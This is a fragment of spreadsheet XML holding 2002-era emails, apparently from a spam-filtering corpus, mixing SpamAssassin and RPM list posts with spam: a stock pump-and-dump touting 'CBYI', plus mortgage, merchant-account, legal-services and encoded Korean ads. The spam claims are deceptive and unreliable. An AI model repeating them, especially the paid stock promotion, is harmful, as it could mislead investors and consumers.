 &gt; &gt; http://spamassassin.org/tests/whitelists.html where we list common
 &gt; &gt; whitelist entries instead.
 &gt;
 &gt; I would happily agree to that.
 &gt;
 &gt; Though maybe it should be a wiki... ;-)
 Just imagine what Ronnie Scelson would do to a wiki *shudder*
 M
 -- 
 --- Coding is art.
 --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</si>
  <si>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 ̸ḮƮ 500   Աȸ 帳ϴ                                 1735jSOB8-522qsvT41-18
</t>
  </si>
  <si>
    <t xml:space="preserve">MDIyOVpnenYyLTU2OEhHSlQyNjI2aUtLVDYtOTgxZXVRQzg1NTRsMzYNCjxodG1sPg0KPGhl
 YWQ+DQoJPHRpdGxlPlVudGl0bGVkPC90aXRsZT4NCjwvaGVhZD4NCjxib2R5IGxpbms9Ymx1
 ZSB2bGluaz1ibHVlPg0KPHRhYmxlIHdpZHRoPTU1MD4NCjx0cj48dGQ+DQo8cD48Zm9udCBj
 b2xvcj1yZWQ+PGI+wMy44biuvbrGriA1MDC4uLCzIDS4uL/4v6Egxsu0z7TZLjwvYj48L2Zv
 bnQ+PC9wPg0KPHA+x9G43sDPwLogyK69x8fPsNQgwaawxbXHvu4gwNaxuL+pLiDB37q5wLog
 x8+zqrXOIL74sbi/qS4NCjxicj656bi4sLO+vyC5rb7uvK0gxsTAzyA1sLO3ziCxuLy6tce+
 7sDWvcC0z7TZLiDGxMDPIMfRsLO05yAyMLjesKHBpLW1ILXLtM+02S4NCjxicj6x17evtM+x
 7iDD0SAxMDC43rChwaS1tSC1y7TPtNkuIMDUsd3Hz73DuOkgudm3ziDAzb26x8O3zr7ut84g
 tNm/7rnesNQgx9i15biztM+02S48L3A+DQo8cD6/5MHyIMGmtaW3ziDBpLiutbUgvsi1yCC1
 5bevv+4guK69usausKEguLnAurWlv6kuILHXt7GwxbTCIMDMuOG4rr26xq6woSC/qbevsLMg
 tNm02rTZtNogutm+7sDWsO0gwOK02cfRILO7v+vAzCC4tyC8r7+pwNbBri4gvsa4tiC+xr3D
 tMIgutDAuiC+xr3Hsqi/ob+pLiC537zbseK3ziC4rr26xq64piDA0MC7tvOw7SDH2LW1IMDQ
 x/TB9sH2tbUgvsrBri4gwaayqLTCIMfRwdm/oSDBpMiuyPcgwMy44cfRsLO+vyDA3yDBpLiu
 tce+7sDWvu6/qS4guvPB2cDMs6ogwMy44cHWvNK/t7+hILrzxK21tSC++L7uv6kuIMGmsKEg
 wffBoiDD38Pix9Gwxb+hv6kuIMDMuOG4rr26xq4gvsi/oSC2sLW1tMIgs8rA+rrQx8+w1CC6
 2b7uwNa0wiDA4rTZx9Egs7u/67W1ILTnv6zI9yC++L3AtM+02S4gv+u1tyDBuyC5+rbzsbgg
 xsi287DtIMfPtM+x7r+pILzux8649MfPvcOwxbOqILHXt7G60LXpILi5wMwgv6y29MHWvLy/
 qS4gPC9wPg0KPHA+wda5rrnmuf3AuiC+xrehwda80rfOILmuwMfH2MHWvLy/5Dxicj4NCr+s
 tvTDszogPGEgaHJlZj1tYWlsdG86dGVjaHRveUBuYXZlci5jb20+dGVjaHRveUBuYXZlci5j
 b208L2E+DQo8L2E+PC9wPg0KDQo8L3RkPjwvdHI+PC90YWJsZT4NCjxiciBjbGVhcj1sZWZ0
 Pg0KPHRhYmxlIHdpZHRoPTU1MCBiZ2NvbG9yPSNjY2ZmY2MgY2VsbHBhZGRpbmc9MTA+PHRy
 Pjx0ZD4NCjxwPsL8sO3A+8C4t84sIMDMufi/oSDAzLjhxsS0wiCwxbTCIDHC97G4v6ksIDLC
 9yA1MDC4uLCzILiuvbrGrrW1IMHYuvHB38DMtM+x7r+pLDxicj4NCsDMsM21tSDHyr/kx9Eg
 utDAuiC5zLiuIL+5vuDH2MHWvLy/qS48YnI+wdi68bXHtMIgtaW3ziC52bfOIL+stvS15bix
 srK/qS48YnI+DQoxwve4rr26xq60wiC55rHdIMPfw+KzobOtILv9u/3H0bDMtM+02S48YnI+
 DQo8YnI+wPq0wiDD38PiseK3ziDAzsXNs92787+hvK0gw9/D4sfRILDNuLggxsi+xr+pLiCx
 1yC/3L+hILCzwM7BpLq4tMIgurjAr8fPsO0gwNbB9iC+yr3AtM+02S4gDQq/wMfYvvjAuL3D
 seIgudm2+LTPtNkuIF5ePC9wPjwvdGQ+PC90cj48L3RhYmxlPg0KPGJyIGNsZWFyPWxlZnQ+
 DQo8dGFibGUgd2lkdGg9NTUwPjx0cj48dGQ+PHA+waS6uMXrvcW6ziCxx7DtILvnx9e/oSDA
 x7DFIMGmuPG/oSBbsaSw7V0gtvOw7SDHpbHix9EgsaSw7SC43sDPwNS0z7TZLjxicj4NCiC8
 9r3FwLsgv/jEob7KwLi46SA8YSBocmVmPSJtYWlsdG86cmVtb3ZlMTIzQG9yZ2lvLm5ldD9T
 VUJKRUNUPbz2vcWwxbrOIj689r3FsMW6zjwvYT64piC0rbevIMHWvLy/5C4gPGJyPjxicj48
 Zm9udCBzaXplPTI+PGI+v+y4rsDHILz2vcWwxbrOv+TDuyDDs7iuuea5/TogvPa9xbDFus63
 ziC16b7uv8IgwMy44bXpwLogwda80rz2wf2x4r+hIMDHx9i8rSDA2rW/wLi3ziC6uLO9u+e2
 9yDB1rzSuLjAzCC89sH9tcggyMQgvPa9xbDFus64rr26xq63ziC48L7Gwf20z7TZLiC02cC9
 IMDMuOG537zbvcMgx8rFzbi1wLsgxevHz7+pILz2vcWwxbrOwNq4piC537zbuK69usauv6G8
 rSC76MGmx9EgyMQgud+828fVtM+02S48L2I+PC9mb250PjwvcD4NCjxwPiBUbyByZW1vdmUg
 eW91cnNlbGYgZnJvbSB0aGlzIG1haWxpbmcgbGlzdCwgZW1haWwgdG8gPGEgaHJlZj0ibWFp
 bHRvOnJlbW92ZTEyM0Bvcmdpby5uZXQ/c3ViamVjdD1SRU1PVkUiPnJlbW92ZTEyM0Bvcmdp
 by5uZXQ8L2E+IHdpdGggdGhlIHdvcmQgInJlbW92ZSIgaW4gdGhlIHN1YmplY3QgbGluZS48
 L3A+PC90ZD48L3RyPjwvdGFibGU+PGJyPg0KDQoNCg0KDQo8L2JvZHk+DQo8L2h0bWw+DQoN
 CjI1OTNrYlRFNC03OTRnUmFJNDg4MFNhRkI2LTgzNXBTck4zNzM2TVNocjAtMTMyVnBRcDky
 NDdsSXlvNy05MzJHdXdUMDc3MHN0RWtsNzINCg==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</si>
  <si>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Get started!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Does Your Business Need to Accept Credit Cards Today?
 Are Your Merchant Fees Too Expensive?
 99% APPROVAL
 Sign Up NOW and Get a FREE Shopping Cart!
 Start Your e-Commerce Store Today!
    Merchant Account
    Free Shopping Cart
    Website Design
    Website Hosting
    Domain Name Registration
 Accept Visa, MasterCard, Discover/Novus and American Express
 NO APPLICATION FEES
 Reply NOW for a FREE, No-Obligation Quote!
 Name:
 Phone:
 Website Address:
 Type Of Business:
 Time to Call:
 Comments:
 To be removed from future offers please reply
 with the word "remove" in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Notes from OSXCon's DRM and Digital Hub panel
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516085
 Date: Not supplied
 We did a great panel on DRM and the Digital Hub yesterday here at OSXCon with 
 Tim O'Reilly, Victor Nemachek (from El Gato, makers of the EyeTV digital TV 
 recorder for the Mac), Dan Gillmor, and JD Lasica, who's working on a book on 
 fair use and copyfights. Glenn "802.11b Networking News" Fleishman took great 
 notes through the talk: 
     Dan: Tim, you're a "content or copyright holdertalk about these issues." 
     Obscurity can be a tool. Something like 100K books published in the US. 
     Most books are forgotten after publication. Ravening copying theft is 
     wrong: most aren't pirated. Publishers puts book that someone sweated over 
     for years on shelves for three months, doesn't sell, that's it, and the 
     author has no rights. Publishers keeps rights til out of print, etc. 
     Oblivion is fate of most books: "Piracy would be the best thing for those 
     books." People wouldn't pirate them in general, because people generally 
     like to respect the rights of creators. "Piracy is a marginal act; it takes 
     away some of the cream." 
     Publishing won't go away, but it will change the idea of who is a 
     publisher. Early on in the Web, the idea was that everyone could be a 
     publisher. The way in which Web sites interact with publishers is often 
     very much like the way that book publishers try to get placement and 
     position in bookstores. 
     Publishing is aggregation. People will re-emerge as publishers. Will 
     Hollywood be the publishers of the future or will someone else? 
     Users are voting by their use of programs like Kazaa. Eventually, media 
     companies will adopt. But if the changes are hardcoded into law, then we're 
     stuck for a long time with "some mistakes."  
 Link[1] Discuss[2] (_via Dan Gillmor's eJournal[3]_)
 [1] http://blog.glennf.com/gmblog/archives/00000254.htm
 [2] http://www.quicktopic.com/boing/H/K3FKZ6jSJe2Px
 [3] http://www.siliconvalley.com/mld/siliconvalley/business/columnists/dan_gillmor/ejournal/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [CYBERIA] [Final CfP]: Int. J. on IT Standards Research
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 Priority: normal
 Date:         Mon, 9 Sep 2002 08:56:49 +0000
 Reply-To:     Law &amp; Policy of Computer Communications
 &lt;CYBERIA-L@LISTSERV.AOL.COM&gt;
 Sender:       Law &amp; Policy of Computer Communications
 &lt;CYBERIA-L@LISTSERV.AOL.COM&gt;
 Comments:     Authenticated sender is jakobs@i4mail.informatik.rwth-aachen.de
 From:         Kai Jakobs &lt;Kai.Jakobs@I4.INFORMATIK.RWTH-AACHEN.DE&gt;
 Subject: [CYBERIA] [Final CfP]: Int. J. on IT Standards Research
 To:           CYBERIA-L@LISTSERV.AOL.COM
 Hello,
 Just a brief reminder that the deadline for submisisons for issue 2
 of the
 'International Journal of IT Standards &amp; Standardization Research' (JITSR)
 is October 1.
 JITSR is a  new, multi-disciplinary publication outlet for everyone who
 is doing research into IT standards and standardisation (from whichever
 perspective).
 So if you think you've got a paper that might fit - why not submit
 it for JITSR?
 And please do ask if you need any further information.
 Greetings from Aachen.
 Cheers,
 Kai.
 -----------------------------
 Call for Papers
 for Issue 2 of the
 International Journal of
 IT Standards &amp; Standardization Research
 This new journal aims to be a platform for presenting, and
 discussing, the broad variety of aspects that make up IT standards
 research. This includes, but is certainly not limited to,
 contributions from the disciplines of computer science, information
 systems, management, business, social sciences (especially science
 and technology studies), economics, engineering, political science,
 public policy, sociology, communication, and human factors/
 usability. In particular, the journal wants to both support and
 promote multi-disciplinary research on IT standards; 'IT'
 should be understood in a very broad sense.
 Topics to be covered include, but are not limited to:
  - Technological innovation and standardisation
  - Standards for information infrastructures
  - Standardisation and economic development
  - Open Source and standardisation
  - Intellectual property rights
  - Economics of standardisation
  - Emerging roles of formal standards organisations and consortia
  - Conformity assessment
  - National, regional, international and corporate standards
    strategies
  - Standardisation and regulation
  - Standardisation as a form of the Public Sphere
  - Standardisation and public policy formation
  - Analyses of standards setting processes, products, and
    organisation
  - Case studies of standardisation
  - Impacts of market-driven standardisation and emerging players
  - The future of standardisation
  - Multinational and transnational perspectives and impacts
  - Commercial value of proprietary specifications
  - Descriptive &amp; prescriptive theories of standardisation
  - Standards research and education activities
  - Tools and services supporting improved standardisation
  - User related issues
  - Risks of standardisation
  - Management of standards
  - History of Standards
  - Standards and technology transfer
 Authors are requested to submit their manuscripts as an e-mail
 attachment in RTF or PDF to the editor-in-chief at
 Kai.Jakobs@i4.informatik.rwth-aachen.de.
 If this form of submission is not possible, please send one hardcopy
 of the manuscript together with a disk containing the electronic
 version of the manuscript in RTF or PDF to:
 Kai Jakobs,
 Technical University of Aachen, Computer Science Department,
 Informatik IV
 Ahornstr. 55, D-52074 Aachen, Germany.
 Manuscripts must be written in English on letter-size or A4 paper,
 one side only, double-spaced throughout, and include at least 1"
 (2.54 cm) of margin on all sides. The cover page should contain the
 paper title, and the name, affiliation, address, phone number, fax
 number, and e-mail address of each author. The second page should
 start with the paper title at the top and be immediately followed by
 the abstract. Except on the cover page, the authors' names and
 affiliations must NOT appear in the manuscript. The abstract of 100-
 150 words should clearly summarise the objectives and content of the
 manuscript. Submitted manuscript should normally be 4000-6000 words
 long; longer ones will be considered but may be subject to editorial
 revision.
 Submission of a paper implies that its content is original and that
 it has not been published previously, and that it is not under
 consideration for publication elsewhere. Yet, significantly extended
 papers previously presented at conferences may be acceptable.
 For more information please see
 http://www-i4.informatik.rwth-aachen.de/~jakobs/standards_journal/journal_home.html
 or visit the publisher's web site at
 http://www.idea-group.com/journals/details.asp?id=497
 Important Dates for the Inaugural Issue:
 Submission Deadline for Issue 2:   October 1, 2002
 Notification of Acceptance:        December 1, 2002
 Camera-ready Paper Due:            January 15, 2003
 ________________________________________________________________
 Kai Jakobs
 Technical University of Aachen
 Computer Science Department
 Informatik IV (Communication and Distributed Systems)
 Ahornstr. 55, D-52074 Aachen, Germany
 Tel.: +49-241-80-21405
 Fax:  +49-241-80-22220
 Kai.Jakobs@i4.informatik.rwth-aachen.de
 http://www-i4.informatik.rwth-aachen.de/~jakobs/kai/kai_home.html
 **********************************************************************
 For Listserv Instructions, see http://www.lawlists.net/cyberia
 Off-Topic threads: http://www.lawlists.net/mailman/listinfo/cyberia-ot
 Need more help? Send mail to: Cyberia-L-Request@listserv.aol.com
 **********************************************************************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</si>
  <si>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Fwd: next Tuesday at 9am
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4.0 Transitional//EN=22&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D=22text/html; charset=3Dwindows-1=
 252=22&gt;
 &lt;STYLE&gt;A:link =7B
     TEXT-DECORATION: none
 =7D
 A:active =7B
     TEXT-DECORATION: none
 =7D
 A:visited =7B
     TEXT-DECORATION: none
 =7D
 A:hover =7B
     COLOR: =230033ff; TEXT-DECORATION: underline
 =7D
 &lt;/STYLE&gt;
 &lt;META content=3D=22MSHTML 6.00.2713.1100=22 name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=23000000 vLink=3D=230033ff link=3D=230033ff bgColor=3D=23ffffff&gt;
 &lt;TABLE borderColor=3D=233366cc cellSpacing=3D4 cellPadding=3D15 border=3D4&gt;
   &lt;TR&gt;
     &lt;TD bgColor=3D=233366cc&gt;
       &lt;DIV align=3Dcenter&gt;&lt;FONT face=3D=22arial, helvetica=22 color=3D=23ffff=
 ff&gt;&lt;FONT size=3D6&gt;&lt;B&gt;For 
       Immediate Release&lt;/B&gt;&lt;BR&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;P&gt;&lt;FONT face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;&lt;FONT=
       size=3D2&gt;&lt;STRONG&gt;Cal-Bay (Stock Symbol:&amp;nbsp;CBYI) 
       &lt;/STRONG&gt;Watch for analyst =22Strong Buy Recommendations=22 and sev=
 eral advisory 
       newsletters picking CBYI.&amp;nbsp;&amp;nbsp; CBYI has filed to be traded=
  on 
       the&amp;nbsp;OTCBB, share prices historically INCREASE when companies=
  get 
       listed on this larger trading&amp;nbsp;exhange. CBYI is trading aroun=
 d =24.30=A2 
       and should skyrocket to =242.66 - =243.25 a share in the near futur=
 e. &amp;nbsp; 
       &lt;STRONG&gt;Put CBYI on your watch list, acquire a postion&lt;/STRONG&gt; 
       &lt;/FONT&gt;&lt;FONT size=3D2&gt;&lt;STRONG&gt;TODAY.&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;F=
 ONT 
       face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;&lt;FONT size=3D2&gt;=
       &lt;P&gt;&lt;B&gt;REASONS TO INVEST IN CBYI&lt;/B&gt; 
       &lt;LI&gt;A profitable company, NO DEBT and is on track to beat ALL ear=
 nings 
       estimates with&lt;FONT size=3D2&gt; increased revenue of 50% annually=21 =
 &lt;/FONT&gt;
       &lt;LI&gt;One of the FASTEST growing distributors in environmental &amp;amp=
 ; safety 
       equipment instruments. 
       &lt;LI&gt;&lt;/FONT&gt;&lt;FONT size=3D2&gt;Excellent management team, several EXCLU=
 SIVE 
       contracts.&amp;nbsp; IMPRESSIVE client list including the&amp;nbsp;U.S. A=
 ir Force, 
       Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=
       GE-Energy &amp;amp; Environmental Research. &lt;/FONT&gt;&lt;/FONT&gt;
       &lt;P&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;RAPIDLY GROWING INDUSTRY&lt;/ST=
 RONG&gt;&amp;nbsp; 
       &lt;BR&gt;Industry revenues exceed =24900 million, estimates indicate th=
 at there 
       could be as much as =2425 billion from =22smell technology=22 by the=
  end of 
       2003.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;=21=21=21=21 CONGRATULATIONS 
       =21=21=21=21=21&lt;BR&gt;&lt;/STRONG&gt;To&amp;nbsp;our subscribers that took advantag=
 e of 
       our&amp;nbsp;last recommendation to buy&amp;nbsp;NXLC.&amp;nbsp; It rallied f=
 rom =247.87 
       to&amp;nbsp;=2411.73=21&lt;/FONT&gt;&amp;nbsp;&amp;nbsp;&lt;/P&gt;&lt;A 
       href=3D=22http://quote.morningstar.com/Quote.html?TimeFrame=3DY*&amp;amp=
 ;ExchangeId=3D&amp;amp;ticker=3DCBYI=22&gt;&lt;FONT 
       color=3D=230000ff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;
       &lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=3D=23ff0000&gt;ALL removes HONERE=
 D. Please allow 7 
       days to be removed and send ALL address to: &lt;A href=3D=22mailto:hon=
 ey9531=40btamail.net.cn=22&gt;honey9531=40mail.net.cn&lt;/A&gt;&lt;/A&gt;&lt;/FONT&gt; 
       &lt;/STRONG&gt;&lt;/A&gt;&lt;/A&gt;&lt;/A&gt;&lt;/P&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;FONT size=3D1&gt;Certain statements contained in this news release may =
 be 
 forward-looking statements within the meaning of The Private Securities=
 Litigation Reform Act of 1995. These statements may be identified by su=
 ch terms 
 as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila=
 r terms. We are NOT 
 a registered investment advisor or a broker dealer. This is NOT an offe=
 r to buy 
 or sell securities. No recommendation that the securities of the compan=
 ies 
 profiled should be purchased, sold or held by individuals or entities t=
 hat learn 
 of the profiled companies. We were paid =2427,000 in cash by a third par=
 ty to 
 publish this report. Investing in companies profiled is high-risk and u=
 se of 
 this information is for reading purposes only. If anyone decides to act=
  as an 
 investor, then it will be that investor's sole risk. Investors are advi=
 sed NOT 
 to invest without the proper advisement from an attorney or a registere=
 d 
 financial broker. Do not rely solely on the information presented, do a=
 dditional 
 independent research to form your own opinion and decision regarding in=
 vesting 
 in the profiled companies. Be advised that the purchase of such high-ri=
 sk 
 securities may result in the loss of your entire investment. &lt;/FONT&gt;&lt;FO=
 NT 
 size=3D1&gt;The owners of this publication may already own free trading sha=
 res in 
 CBYI and may immediately sell all or a portion of these shares into the=
  open 
 market at or about the time this report is published.&amp;nbsp; Factual sta=
 tements 
 are made as of the date stated and are subject to change without notice=
 .&amp;nbsp; 
 Not intended for recipients or residents of CA,CO,CT,DE,ID, &lt;FONT 
 size=3D1&gt;IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where 
 prohibited.&amp;nbsp; &lt;/FONT&gt;&lt;FONT size=3D1&gt;Copyright c 2001&lt;/FONT&gt; 
 &lt;/FONT&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 *****
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mortgage Rates Are Down.  teoqknmp
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.
 http://quotes.routeit21.com/sure_quote/
 Take a moment to let us show you that we are here to save you money and address your concerns with absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's top companies.
 -Mortgage rates that save you thousands.
 -New home loans.
 -Refinance or consolidate high interest credit card debt into a low interest mortgage.
 http://quotes.routeit21.com/sure_quote/
 "...was able to get 3 great offers in
 less than 24 hours." -Jennifer C
 "Met all my needs... being able to search
 for loans in a way that puts me in control." -Robert T.
 "..it was easy, effortless...!"-Susan A.
 Click here to delete your address from future updates.
 http://quotes.routeit21.com/sure_quote/rm/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: rpm-zzzlist@freshrpms.net
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Thanks for the great work Mathias but I would like to point out that this
 list is fastly become the apt-rpm-list instead of the rpm-list. The
 discussion concerning apt is overwhelming. Maybe another list is in order
 for those having trouble with apt-rpm. apt-rpm-hotline@freshrpms.net ? :)
 Though I think apt-rpm is a great tool, I don't use it and would like to
 get back to talk of new packages and rpm building techniques.
 dTd
 Daniel T. Drea
 dandanielle@mindspring.com
 http://dandanielle.home.mindspring.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] SA very slow (hangs?) on this message, or is it just me?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday 29 August 2002 16:39 CET Mike Burger wrote:
 &gt; &gt;[...]
 &gt; &gt; re-check I find it immediately:
 &gt; &gt; :0fw
 &gt; &gt; * &lt; 250000
 &gt; &gt; | spamassassin -P
 &gt; &gt;
 &gt; &gt; Works perfectly now. Sorry for being such a pest! ;-)
 &gt; &gt;[...]
 &gt;
 &gt; I'm using SA via spamc/spamd, and a global /etc/procmail file.  I'm
 &gt; wondering if this would also work in that fashion.
 spamc will skip every file bigger than 250k on it's own. It's got the 
 command line switch -s to change this value. But it doesn't hurt of course 
 to use the procmail limit.
 Malte
 -- 
 -- Coding is art.
 --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</si>
  <si>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Re: [SAtalk] Re: patent on TMDA-like system
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002 the voices made Robin Lynn Frank write:
 &gt; &gt; Tony Svanstrom, on SpamAssassin-talk, noted this US patent:
 &gt; &gt;
 &gt; &gt; http://appft1.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&amp;Sect2=HITOFF&amp;u=/netah
 &gt; &gt;tml/PTO/search-adv.html&amp;r=62&amp;f=G&amp;l=50&amp;d=PG01&amp;s1=spam&amp;p=2&amp;OS=haiku&amp;RS=spam
 &gt; I took a bit of time to review what is on the above URL.  If I were a news
 &gt; editor, the headline would be:
 &gt;
 &gt; "Inventor" from country that ignores patents and copyrights, seeks patent for
 &gt; inventing the wheel!
  The wheel is already patented in Australia; Melbourne man patents the wheel:
  &lt;URL: http://216.239.39.100/search?q=cache:usJnd2dwCDQC:www.theage.com.au/news/state/2001/07/02/FFX0ADFPLOC.html+%22patents+the+wheel%22&amp;hl=en&amp;lr=lang_en|lang_sv&amp;ie=UTF-8 &gt;
  The sad news is that there seems to be a lot of patents (pending or not)
 that's for very basic/general ideas; it's the current form of "domainnapping",
 and it might turn uggly when people start trying to enfoce these patents.
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm talking specifically about the last ~24 hours where it seems 
 like things have not been working.  People who've been using the 
 Outlook plugin have been telling me they've been seeing really 
 bad performance, which I've been attributing to the problems 
 which have been discussed here and on sa-talk.  I'm not saying 
 it's completely not working, or that it has no chance of being 
 fixed 15 minutes from now, just that it's not currently working, 
 and there have been a number of "hiccup" periods in the last 
 couple months.  Plus, it's hard to deny that we don't know yet 
 if the trust network is going to work or not -- it only just got 
 switched on, and that changeover seems to have corresponded with 
 people noticing things have stopped working right.
 C
 On Thursday, August 8, 2002, at 01:44  PM, Jordan Ritter wrote:
 &gt; On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:
 &gt;
 &gt; # Razor2 seems to have been a long time in coming, [...] and doesn't
 &gt; # currently work.
 &gt;
 &gt; Quite a strong statement, Craig, one which over 30,000 active users a
 &gt; day would strongly disagree with.
 &gt;
 &gt;
 &gt; --jordan
 &gt;
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Top-Notch attorneys for PENNIES a day
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;HEAD&gt;
 &lt;title&gt;Legal Solutions For Pennies A Day&lt;/title&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellSpacing=0 cols=1 cellPadding=15 width=630 bgColor=#ffffff border=1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width="100%"&gt;
       &lt;CENTER&gt;&lt;BR&gt;&lt;B&gt;&lt;FONT 
       size=+1&gt;You Can Receive Thousands of Dollars in Legal 
       Services&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; &lt;BR&gt;&lt;B&gt;&lt;FONT color=#663300&gt;&lt;FONT size=+3&gt;For 
       Only Pennies a Day&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; &lt;BR&gt;&lt;B&gt;&lt;FONT 
       face=Arial,Helvetica&gt;&lt;FONT color=#000000&gt;&lt;FONT size=-2&gt;- US &amp;amp; Canada 
       Only -&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
       &lt;P&gt;&lt;IMG height=95 
       src="http://image.consumerpackage.net/promotions/legal/money20.jpg" width=150 
       NOSEND="1"&gt; 
       &lt;P&gt;&lt;B&gt;&lt;FONT color=#000000&gt;&lt;FONT size=+2&gt;If You Answer 
       YES&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; &lt;BR&gt;&lt;B&gt;&lt;FONT size=+1&gt;To One or More of the Following 
       Questions&lt;/FONT&gt;&lt;/B&gt;&lt;/CENTER&gt;
       &lt;UL&gt;
         &lt;UL&gt;
           &lt;UL&gt;
             &lt;UL&gt;
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Received a Traffic Ticket You Thought Was 
               Unjustified?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Paid a Bill You Knew Was Unfair?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Lost A Security Deposit?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Bought a Home or Purchased A Car?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Signed an Employment Contract?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Had difficulty collecting an insurance 
               claim?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Had Trouble With Your Credit 
               Report?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Been Involved in a Landlord or Property 
               Dispute?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Been involved in a separation or 
               divorce?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
